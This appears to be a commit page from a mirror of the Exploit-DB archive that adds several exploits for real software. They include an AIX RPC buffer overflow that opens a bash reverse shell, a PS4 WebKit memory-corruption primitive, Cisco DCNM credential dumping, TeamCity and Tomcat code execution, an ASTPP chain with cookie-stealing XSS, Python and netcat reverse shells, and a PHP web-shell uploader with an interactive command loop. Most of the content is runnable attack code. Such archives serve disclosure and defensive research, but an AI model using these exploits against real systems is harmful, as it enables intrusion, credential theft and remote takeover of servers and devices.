bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-01-09

Browse source 
9 changes to exploits/shellcodes

Cisco DCNM JBoss 10.4 - Credential Leakage
EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
ASTPP VoIP 4.0.1 - Remote Code Execution
JetBrains TeamCity 2018.2.4 - Remote Code Execution
Codoforum 4.8.3 - 'input_txt' Persistent Cross-Site Scripting
Online Book Store 1.0 - Unauthenticated Remote Code Execution
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)

Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
This commit is contained in:
Offensive Security 2020-01-09 05:02:04 +00:00
parent fe24bda1f5
commit c7085a57b4
11 changed files with 1200 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

256
exploits/hardware/remote/47888.py Executable file
View file

@ -0,0 +1,256 @@
# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
# Date: 2018-09-19
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.ibm.com/us-en/
# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
# Tested on: IBM AIX PPC
# CVE: CVE-2017-3623
# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
#!/usr/bin/python
# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
def getCredLoopbackBody():
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Doesn't matter, ljust call assumes len <= 4
node_name = 'hn'
node_length = pack('>I', len(node_name))
node_name = node_name.ljust(4, '\x00')
# Also doesn't matter
uid = pack('>I', 0)
gid = pack('>I', 0)
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
gids_len = pack('>I', 64)
base_addr = pack('>I', gid_base)
addr_8c = pack('>I', gid_base + 0x8c)
addr_a8 = pack('>I', gid_base + 0xa8)
addr_4c = pack('>I', gid_base + 0x4c)
func_addr = pack('>I', execl_func)
toc_addr = pack('>I', execl_toc)
cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
cmd = cmd.ljust(0x30, '\x00')
# Each GID is 4 bytes long, we want 64
gids = (
# +0x0 # filepath
'/usr/bin/bash\x00\x00\x00'
# +0x10 # argv[0]
'bash\x00\x00\x00\x00'
# +0x18 # argv[1]
'-c\x00\x00'
# +0x1c # argv[2]
) + cmd + (
# +0x4c # r3 = filepath
'\x70\x63\x00\x00' # andi. r3, r3, 0x0
'\x3c\x60'
) + base_addr[0:2] + ( # lis r3, ...
'\x60\x63'
) + base_addr[2:4] + ( # ori r3, r3, ...
# +0x58 # r4 = argv[0]
'\x38\x83\x00\x10' # addi r4, r3, 0x10
# +0x5c # r5 = argv[1]
'\x38\xa4\x00\x08' # addi r5, r4, 0x8
# +0x60 # r6 = argv[2]
'\x38\xc5\x00\x04' # addi r6, r5, 0x4
# +0x64 # r7 = NULL
'\x70\xe7\x00\x00' # andi. r7, r7, 0x0
# +0x68 # r2 = libc.a TOC for execl
'\x70\x42\x00\x00' # andi. r2, r2, 0x0
'\x3c\x40'
) + toc_addr[0:2] + ( # lis r2, ...
'\x60\x42'
) + toc_addr[2:4] + ( # ori r2, r2, ...
# +0x74 # execl
'\x71\x08\x00\x00' # andi. r8, r8, 0x0
'\x3d\x00'
) + func_addr[0:2] + ( # lis r8, ...
'\x61\x08'
) + func_addr[2:4] + ( # ori r8, ...
'\x7d\x09\x03\xa6' # mtctr r8
'\x4e\x80\x04\x21' # bctrl
# +0x88 # 0x14 padding
'AAAAAAAAAAAAAAAAAAAA'
# +0x9c # Will be NULL
'ZZZZ'
# +0xa0
# @+948: r5 = +0x8c
# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
# +0xa4
# @+968: r5 = +0xa8
# @+972: r0 = *(r5 + 0x0) = *(+0xa8)
# +0xa8
# @+972: r0 = +0x4c
# @+980: ctr = r0 = +0x4c
# @+988: branch to ctr
) + addr_8c + addr_a8 + addr_4c + (
# +0xac # padding
'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
)
print ":".join("{:02x}".format(ord(c)) for c in gids)
print len(gids)
return epoch + node_length + node_name + uid + gid + gids_len + gids
def getCredLoopback():
cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
cred_body = getCredLoopbackBody()
cred_len = pack('>I', len(cred_body))
return cred_flavor + cred_len + cred_body
def getAuthNone():
auth_flavor = pack('>I', 0) # AUTH_NONE
auth_len = pack('>I', 0)
return auth_flavor + auth_len
def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
xid = urandom(4)
mtype = pack('>I', 0) # CALL
rpcvers = pack('>I', 2)
prog = pack('>I', prog_num)
vers = pack('>I', ver_num)
proc = pack('>I', proc_num)
cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
verf = getAuthNone()
return xid + mtype + rpcvers + prog + vers + proc + cred + verf
def getPacket(message):
# MSB on = this is the last fragment
# LSBs = fragment length
frag = pack('>I', len(message) + 0x80000000)
return frag + message
if len(argv) < 7:
print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
exit(1)
rhost = argv[1]
lhost = argv[2]
lport = argv[3]
gid_base = int(argv[4], 16)
execl_func = int(argv[5], 16)
execl_toc = int(argv[6], 16)
# Query the portmapper for services
services = []
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
if (prog_num == 100024 # status
and proto_num == 6): # TCP
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
for service in services:
prog_num, ver_num, port = service
serv_str = str(prog_num) + ' v' + str(ver_num)
for attack in [False, True]:
sleep(1) # be gentle
print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
break

267
exploits/hardware/webapps/47893.js Normal file
View file

@ -0,0 +1,267 @@
/*
bad_hoist
============
Exploit implementation of
[CVE-2018-4386](https://bugs.chromium.org/p/project-zero/issues/detail?id=1665).
Obtains addrof/fakeobj and arbitrary read/write primitives.
Supports PS4 consoles on 6.XX. May also work on older firmware versions,
but I am not sure. Bug was fixed in firmware 7.00.
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47893.zip
*/
var STRUCTURE_SPRAY_SIZE = 0x1800;
var g_confuse_obj = null;
var g_arb_master = null;
var g_arb_slave = new Uint8Array(0x2000);
var g_leaker = {};
var g_leaker_addr = null;
var g_structure_spray = [];
var dub = new Int64(0x41414141, 0x41414141).asDouble();
var g_inline_obj = {
a: dub,
b: dub,
};
function spray_structs() {
for (var i = 0; i < STRUCTURE_SPRAY_SIZE; i++) {
var a = new Uint32Array(0x1)
a["p" + i] = 0x1337;
g_structure_spray.push(a); // keep the Structure objects alive.
}
}
function trigger() {
var o = {
'a': 1
};
var test = new ArrayBuffer(0x100000);
g_confuse_obj = {};
var cell = {
js_cell_header: new Int64([
0x00, 0x8, 0x00, 0x00, // m_structureID, current guess
0x0, // m_indexingType
0x27, // m_type, Float64Array
0x18, // m_flags, OverridesGetOwnPropertySlot |
// InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
0x1 // m_cellState, NewWhite
]).asJSValue(),
butterfly: false, // Some arbitrary value
vector: g_inline_obj,
len_and_flags: (new Int64('0x0001000100000020')).asJSValue()
};
g_confuse_obj[0 + "a"] = cell;
g_confuse_obj[1 + "a"] = {};
g_confuse_obj[1 + "b"] = {};
g_confuse_obj[1 + "c"] = {};
g_confuse_obj[1 + "d"] = {};
for (var j = 0x5; j < 0x20; j++) {
g_confuse_obj[j + "a"] = new Uint32Array(test);
}
for (var k in o) {
{
k = {
a: g_confuse_obj,
b: new ArrayBuffer(test.buffer),
c: new ArrayBuffer(test.buffer),
d: new ArrayBuffer(test.buffer),
e: new ArrayBuffer(test.buffer),
1: new ArrayBuffer(test.buffer),
};
function k() {
return k;
}
}
o[k];
if (g_confuse_obj["0a"] instanceof Uint32Array) {
return;
}
}
}
function setup_arb_rw() {
var jsCellHeader = new Int64([
0x00, 0x08, 0x00, 0x00, // m_structureID, current guess
0x0, // m_indexingType
0x27, // m_type, Float64Array
0x18, // m_flags, OverridesGetOwnPropertySlot |
// InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
0x1 // m_cellState, NewWhite
]);
g_fake_container = {
jsCellHeader: jsCellHeader.asJSValue(),
butterfly: false, // Some arbitrary value
vector: g_arb_slave,
lengthAndFlags: (new Int64('0x0001000000000020')).asJSValue()
};
g_inline_obj.a = g_fake_container;
g_confuse_obj["0a"][0x4] += 0x10;
g_arb_master = g_inline_obj.a;
g_arb_master[0x6] = 0xFFFFFFF0;
}
function read(addr, length) {
if (!(addr instanceof Int64))
addr = new Int64(addr);
g_arb_master[4] = addr.low32();
g_arb_master[5] = addr.hi32();
var a = new Array(length);
for (var i = 0; i < length; i++)
a[i] = g_arb_slave[i];
return a;
}
function read8(addr) {
return read(addr, 1)[0];
}
function read16(addr) {
return Struct.unpack(Struct.int16, read(addr, 2));
}
function read32(addr) {
return Struct.unpack(Struct.int32, read(addr, 4));
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function readstr(addr) {
if (!(addr instanceof Int64))
addr = new Int64(addr);
g_arb_master[4] = addr.low32();
g_arb_master[5] = addr.hi32();
var a = [];
for (var i = 0;; i++) {
if (g_arb_slave[i] == 0) {
break;
}
a[i] = g_arb_slave[i];
}
return String.fromCharCode.apply(null, a);
}
function write(addr, data) {
if (!(addr instanceof Int64))
addr = new Int64(addr);
g_arb_master[4] = addr.low32();
g_arb_master[5] = addr.hi32();
for (var i = 0; i < data.length; i++)
g_arb_slave[i] = data[i];
}
function write8(addr, val) {
write(addr, [val]);
}
function write16(addr, val) {
write(addr, Struct.pack(Struct.int16, val));
}
function write32(addr, val) {
write(addr, Struct.pack(Struct.int32, val));
}
function write64(addr, val) {
if (!(val instanceof Int64))
val = new Int64(val);
write(addr, val.bytes());
}
function writestr(addr, str) {
if (!(addr instanceof Int64))
addr = new Int64(addr);
g_arb_master[4] = addr.low32();
g_arb_master[5] = addr.hi32();
for (var i = 0; i < str.length; i++)
g_arb_slave[i] = str.charCodeAt(i);
g_arb_slave[str.length] = 0; // null character
}
function setup_obj_leaks() {
g_leaker.leak = false;
g_inline_obj.a = g_leaker;
g_leaker_addr = new Int64(g_confuse_obj["0a"][4], g_confuse_obj["0a"][5]).add(0x10);
debug_log("obj_leaker address @ " + g_leaker_addr);
}
function addrof(obj) {
g_leaker.leak = obj;
return read64(g_leaker_addr);
}
function fakeobj(addr) {
write64(g_leaker_addr, addr);
return g_leaker.leak;
}
function typed_array_buf_addr(typed_array) {
return read64(addrof(typed_array).add(0x10));
}
function cleanup() {
var u32array = new Uint32Array(8);
header = read(addrof(u32array), 0x10);
write(addrof(g_arb_master), header);
write(addrof(g_confuse_obj['0a']), header);
// Set length to 0x10 and flags to 0x1
// Will behave as OversizeTypedArray which can survive gc easily
write32(addrof(g_arb_master).add(0x18), 0x10);
write32(addrof(g_arb_master).add(0x1C), 0x1); //
write32(addrof(g_confuse_obj['0a']).add(0x18), 0x10);
write32(addrof(g_confuse_obj['0a']).add(0x1C), 0x1);
write32(addrof(g_arb_slave).add(0x1C), 0x1);
var empty = {};
header = read(addrof(empty), 0x8);
write(addrof(g_fake_container), header);
}
function start_exploit() {
debug_log("Spraying Structures...");
spray_structs();
debug_log("Structures sprayed!");
debug_log("Triggering bug...");
trigger();
debug_log("Bug successfully triggered!");
debug_log("Crafting fake array for arbitrary read and write...");
setup_arb_rw();
debug_log("Array crafted!");
debug_log("Setting up arbitrary object leaks...");
setup_obj_leaks();
debug_log("Arbitrary object leaks achieved!");
debug_log("Cleaning up corrupted structures...");
cleanup();
debug_log("Cleanup done!");
debug_log("Starting post exploitation...");
}
start_exploit();

61
exploits/java/remote/47885.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999
# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java
# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]
package com.whatdidibreak.dcnm_expl;
import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
public class Main {
public static void main(String[] args) throws Throwable {
for (String target : args) {
System.out.println("Target: " + target);
Properties jndiProps = new Properties();
jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
jndiProps.put("jboss.naming.client.ejb.context", true);
Context ctx = new InitialContext(jndiProps);
DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");
for (DBRowDO row : i.getServerProperties(null).getRows()) {
String propName = row.getEntry()[0];
String propValue = row.getEntry()[1];
if (propValue.isEmpty()) {
continue;
}
if (propName.contains("user")) {
System.out.println(propName + " = " + propValue);
} else if (propName.contains("pass")) {
System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
}
}
System.out.println();
}
}
}

149
exploits/java/remote/47891.txt Normal file
View file

@ -0,0 +1,149 @@
# Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution
# Date: 2020-01-07
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.jetbrains.com/
# Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads
# Version: 2018.2.4 for Windows
# CVE: CVE-2019-15039
# You'll need a few .jars from a copy of TeamCity to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/teamcity_expl/Main.java
# Instructions for Windows (easier case):
# 1) Verify exploitability.
# 1a) Verify the remote host is running Windows, e.g. checking for common
# running services and their versions.
# 1b) Discover Java RMI services on the remote host, e.g. doing a 65k port
# scan using nmap and the rmi-dumpregistry script. On one port, there
# should be a registry with an object named teamcity-mavenServer. This
# object should point to a second open port that is also identified as
# Java RMI.
# 2) Prepare the payload.
# 2a) There needs to be an SMB share that the TeamCity software can read from
# and that you can write to. You might establish a share on your own
# system and make it accessible to anonymous users. Alternatively, if the
# TeamCity server is domain-joined, you might find a pre-existing share
# elsewhere in the domain.
# 2b) Place a malicious POM in that share, e.g.
<project>
<modelVersion>4.0.0</modelVersion>
<groupId>com.mycompany.app</groupId>
<artifactId>my-module</artifactId>
<version>1</version>
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.1.1</version>
<executions>
<execution>
<goals>
<goal>exec</goal>
</goals>
</execution>
</executions>
<configuration>
<executable>calc</executable>
<arguments>
<argument>-testarg</argument>
</arguments>
</configuration>
</plugin>
</plugins>
</build>
</project>
# 3) Run this exploit.
# Argument #1: TeamCity host (IP or FQDN)
# Argument #2: Port of RMI Registry (the first open port described above)
# Argument #3: UNC path to the malicious POM file (e.g., \\ip\share\pom.xml)
# Argument #4: POM goal (e.g., exec:exec)
# NOTE: It is possible to exploit this issue in other situations, e.g. if the
# TeamCity server is running on a *nix system that allows access to some local
# directory over NFS.
*/
package com.whatdidibreak.teamcity_expl;
import java.io.File;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMISocketFactory;
import java.util.ArrayList;
import java.util.List;
import jetbrains.buildServer.maven.remote.MavenServer;
import jetbrains.buildServer.maven.remote.RemoteEmbedder;
import org.jetbrains.maven.embedder.MavenEmbedderSettings;
import org.jetbrains.maven.embedder.MavenExecutionResult;
public class Main {
public static void main(String[] args) throws Throwable {
String host = args[0];
int port = Integer.parseInt(args[1]);
String pomPath = args[2];
String goal = args[3];
// The exported object may point to a different host than what we're
// using to connect to the registry, which could break things, i.e.,
// - localhost
// - for a multi-homed target, an IP we can't connect to
// - a FQDN or hostname we can't resolve
// - etc.
// For this reason, we'll set up a socket factory that forces all
// connections to go to the host specified by the user, ignoring the
// host pointed to by the exported object.
OverrideHostSocketFactory sf = new OverrideHostSocketFactory(host);
RMISocketFactory.setSocketFactory(sf);
// The rest of the code in this method should look fairly typical for
// interacting with remote objects using RMI.
Registry r = LocateRegistry.getRegistry(host, port, sf);
MavenServer ms = (MavenServer) r.lookup("teamcity-mavenServer");
MavenEmbedderSettings mes = new MavenEmbedderSettings();
RemoteEmbedder re = ms.exportEmbedder(mes);
File f = new File(pomPath);
List ap = new ArrayList();
List g = new ArrayList();
g.add(goal);
MavenExecutionResult mer = re.execute(f, ap, g);
}
private static class OverrideHostSocketFactory extends RMISocketFactory {
private String targetHost;
public OverrideHostSocketFactory(String targetHost) {
this.targetHost = targetHost;
}
@Override
public Socket createSocket(String host, int port) throws IOException {
Socket toReturn = new Socket();
toReturn.connect(new InetSocketAddress(targetHost, port));
return toReturn;
}
@Override
public ServerSocket createServerSocket(int port) throws IOException {
throw new UnsupportedOperationException("Not supported yet.");
}
}
}

83
exploits/java/webapps/47892.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
# Date: 2020-01-07
# Exploit Author: Harrison Neal, PatchAdvisor
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
# Version: 8.0.36
# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
# Tested on: Windows
# CVE: CVE-2016-5018
/*
# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.
# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
# In the Java tab, add the following options:
# -Djava.security.manager
# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
*/
<%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
<%
SecurityManager sm = System.getSecurityManager();
if (sm != null) {
try {
ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();
{ // Tomcat 7+
// Get the desired method
Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
"${pageContext.getServletContext().getClass().getDeclaredMethods()}",
Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7
Method theMethod = null;
for (Method m : methods) {
if ("executeMethod".equals(m.getName())) {
theMethod = m;
break;
}
}
// Set it to accessible
JspRuntimeLibrary.introspecthelper(
theMethod,
"accessible",
"true",
request,
null,
false);
// Run it
theMethod.invoke(pageContext.getServletContext(),
System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
null,
new Object[]{null}
);
}
/*{ // Tomcat 5.5 and 6
pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
}*/
} catch (Throwable ex) {
PrintWriter pw = new PrintWriter(out);
ex.printStackTrace(pw);
pw.flush();
}
}
// Your payload goes here
try {
Runtime.getRuntime().exec("calc");
} catch (Throwable ex) {
PrintWriter pw = new PrintWriter(out);
ex.printStackTrace(pw);
pw.flush();
}
// Optional put the security manager back
if (sm != null) {
System.setSecurityManager(sm);
}
%>

72
exploits/linux/remote/47889.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: ASTPP VoIP 4.0.1 - Remote Code Execution
# Date: 2019-11-18
# Exploit Author: Fabien AUNAY
# Vendor Homepage: https://www.astppbilling.org/
# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
# Version: 4.0.1 vendor default setup script
# Tested on: Debian 9 - CentOS 7
# CVE : -
###########################################################################################################
ASTPP 4.0.1 VoIP Billing Chained Remote Root
A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
It is available as an open source solution. It means without any investment, one can start his telephony
business using ASTPP.
ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
solution to “A Smart TelePhony Platform”.
The latest version of ASTPP is provisioned with some advanced functional modules which are designed
to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
Technology.
Steps are as follows:
Objective 1 : Edit the SIP device and try to test user inputs
Objective 2 : Try to trigger a XSS
Objective 3 : Try to evade filters
Objective 4 : Session Hijack
Objective 5 : Plugin command injection
Objective 6 : Reverse shell
Objective 7 : Root the system
Objective 8 : Looting
###########################################################################################################
Objective 1 : html code in SIP Caller Number
POC: <b>ASTPP html test</b>
Objective 2 : XSS injection in SIP Caller Name
POC: <svg/onload=alert('XsS-Inj3cTIoN')>
Objective 3 : XSS document.cookie evasion
POC: <svg/onload=alert(document/*foo*/./*bar*/cookie)>
Objective 4 : XSS document.cookie grabber
POC: <svg/onload=window.open("http://127.0.0.1:8080/?"+document/*foo*/./*bar*/cookie)>
Alternative : if the user input is limited, it is possible in some cases to modify the length with the inspector
POC: <input data-ripple="" type="text" name="name" value="1" placeholder="" size="20" maxlength="30" class="col-md-12 form-control form-control-lg">
POC': <input data-ripple="" type="text" name="name" value="1" placeholder="" size="20" maxlength="250" class="col-md-12 form-control form-control-lg">
Objective 5 : Plugin command injection
After administrator cookie and session hijack, it is possible to install some stuff. ASTPP allows one of the best to perform a system command injection.
The get addons sub menu, allow attacker to install “Switch Monitoring”. Use the system command followed by your instructions and press 'Submit'
POC : system date;id;whoami
Objective 6 : Reverse shell
POC: system python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Objective 7 : Root the system
A vulnerability was identified in web Crons menu. The cron task was executed with root permissions due to a wrong configuration of the installation script.
Before use it, you should step back to your reverse shell and check the date of the server.
POC:
Name: Exploit cron
Command: nc 127.0.0.1 8080 -e /bin/bash
Interval Type: Minute
Interval: 1
Next Execution Date: xxxx-xx-xx yy:yy:yy
Status: Active
Objective 8 : Looting
The /var/lib/astpp/astpp-config.conf file contains all information to explore the database.

37
exploits/php/webapps/47886.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
# Google Dork: intext:"Powered by Codoforum"
# Date: 2020-01-07
# Exploit Author: Vyshnav Vizz
# Vendor Homepage: https://codoforum.com/index.php
# Software Link: https://codoforum.com/buy
# Version: Codoforum 4.8.3
# Tested on: Linux
# CVE : N/A
Codoforum is prone to a Persistent Cross-site Scripting Vulnerability in User-Comment replay section
An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
Codoforum version 4.8.3 is vulnerable.
1. Install Codoforum 4.8.3 in a local server.
2. Go to Start a new Topic >> Replay to any of the comment with XSS Payload
3. Payload : "><svg/onload=alert(1)>
4. Now an XSS alert will be triggered here.
POC:
POST /forum/index.php?u=/Ajax/topic/reply HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Origin: http://susmost.com
Connection: close
Referer: http://localhost/forum/index.php?u=/topic/21/avg-antivirus-download-avg-antivirus-free-download-topbrandscompare
Cookie: PHPSESSID=b5dccfcef3b5f4ce9571fbd3269d5b23; cf=0
input_txt="><svg/onload=alert(1)>&output_txt=STARTCODOTAGp%3E%22%26gt%3B%26lt%3Bsvg%2Fonload%3Dalert(1)%26gt%3BSTARTCODOTAG%2Fp%3E%0A&tid=21&end_of_line=&token=35f5f85a86b15f475bbd9b79de313fa0&pid=false

47
exploits/php/webapps/47887.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A
import argparse
import random
import requests
import string
import sys
parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()
url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
if random_file in r.text:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
if launch_shell.lower() == 'y':
while True:
cmd = str(input('RCE $ '))
if cmd == 'exit':
sys.exit(0)
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
print(r.text)
else:
if r.status_code == 200:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
else:
print('> Web shell failed to upload! The web server may not have write permissions.')

8
files_exploits.csv
View file

@ -17908,6 +17908,10 @@ id,file,description,date,author,type,platform,port
47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
47837,exploits/multiple/remote/47837.py,"nostromo 1.9.6 - Remote Code Execution",2020-01-01,Kr0ff,remote,multiple,
47885,exploits/java/remote/47885.txt,"Cisco DCNM JBoss 10.4 - Credential Leakage",2020-01-08,hantwister,remote,java,
47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,
47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
